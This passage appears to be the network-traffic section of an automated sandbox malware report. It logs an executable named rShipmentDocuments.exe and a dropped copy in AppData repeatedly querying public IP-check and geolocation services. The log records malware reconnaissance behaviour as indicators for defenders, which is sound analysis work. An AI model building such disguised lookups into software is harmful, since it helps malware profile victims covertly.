                                                    2 | 192.168.2.4 | 49739 | 132.226.247.73 | 80 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:20.430373907 CEST | 127 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Oct 11, 2024 09:35:21.096147060 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:20 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 58f8a8c67194d528afb001cd9be54295
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    3 | 192.168.2.4 | 49743 | 132.226.247.73 | 80 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:21.694551945 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:22.381772041 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:22 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 2e900d54ced6b7be60f9d3a0d7774a94
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    4 | 192.168.2.4 | 49744 | 132.226.247.73 | 80 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:22.090209007 CEST | 127 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Oct 11, 2024 09:35:22.754828930 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:22 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 83c50c5da8485f990b581e20dfef45ff
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    5 | 192.168.2.4 | 49747 | 132.226.247.73 | 80 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:23.046443939 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:23.718689919 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:23 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 605d1ead0d7a7faecb146c791b8e7142
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    6 | 192.168.2.4 | 49748 | 132.226.247.73 | 80 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:23.389908075 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:24.079411983 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:23 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 597bed303afd75dbc76ed96699ee7a8c
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    7 | 192.168.2.4 | 49751 | 132.226.247.73 | 80 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:24.356801033 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:25.028584957 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:24 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 607f0d06f6333d37e7635fc25491abe8
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    8 | 192.168.2.4 | 49752 | 132.226.247.73 | 80 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:24.698442936 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:25.362610102 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: f4159d9fcb6eb2024ece26655d2a8723
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    9 | 192.168.2.4 | 49755 | 132.226.247.73 | 80 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:25.644639969 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:26.318897963 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:26 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: fc272f3232c7b23c18dd822ed8c05d0e
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    10 | 192.168.2.4 | 49756 | 132.226.247.73 | 80 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:25.983186007 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:26.655930996 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:26 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 7d5d61084874855c9cb89c0e1fafa04b
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    11 | 192.168.2.4 | 49759 | 132.226.247.73 | 80 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:26.983357906 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:27.674367905 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:27 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: a5fd577165439802edf940f3b649e14b
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    12 | 192.168.2.4 | 49760 | 132.226.247.73 | 80 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:27.408684969 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:28.071233988 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:27 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: d2db1517ce00b569d190494ab3705947
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    13 | 192.168.2.4 | 49763 | 132.226.247.73 | 80 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:28.289654970 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:28.953393936 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:28 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: dbb51839ccbd7a618c9b7743c2aad139
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    14 | 192.168.2.4 | 49764 | 132.226.247.73 | 80 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:28.694603920 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:29.394510031 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:29 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: b4a7c914b1eee4b45006f03c012fe24b
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    15 | 192.168.2.4 | 49768 | 132.226.247.73 | 80 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:30.023770094 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:30.688242912 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:30 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 781319fcd30c2d818c148eacd2fda05a
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.4 | 49734 | 188.114.96.34 | 443 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:19 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:19 UTC | 699 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: MISS
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cU%2FZMJXKNwcpmwEiqd9cVMr5%2Bh7xKFKObTxQhri6EVgkavrRLLmywWJ0n0u%2B%2Bmsg1K9FpQU0MC0NcG1iaqErJ4q4uBq7KAUHpY%2B99iZrhrUBMpoenMJ6ZqjPKdkJy60rKJVue0zX"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c38497c1815-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:19 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    1 | 192.168.2.4 | 49738 | 188.114.96.34 | 443 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:20 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:20 UTC | 700 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:20 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 1
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KdLEw1RTyrgO1qBCOEfIayfxedSakvwbOY0DkiR7uLv3GH0UhBATZa9nq3AFYNR%2Bi%2F4pGhC0ajgwQvMFsYXGWjsHNDyOidFwyXbFPESQ4b1KAcLWqAfzntcF5xDKs5PbGYPIB4kB"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c404c960f63-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:20 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    2 | 192.168.2.4 | 49740 | 188.114.96.34 | 443 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:21 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:21 UTC | 702 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:21 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 2
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yEU%2B8CHXIMo9HU4t2lECYw9aTeh3R3F4P6MBQRrtCHscTy9fZa3GBJAW41Vj4GJ5TBN3Co0l7nijtzncjETD7aQjJtYLfgpJacYXzoG8e8EPDYy9z%2BgHqcbH%2FkOHG79iShMG20I3"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c457ac34358-EWR
                                                    alt-svc: h3=":443"; ma=86400
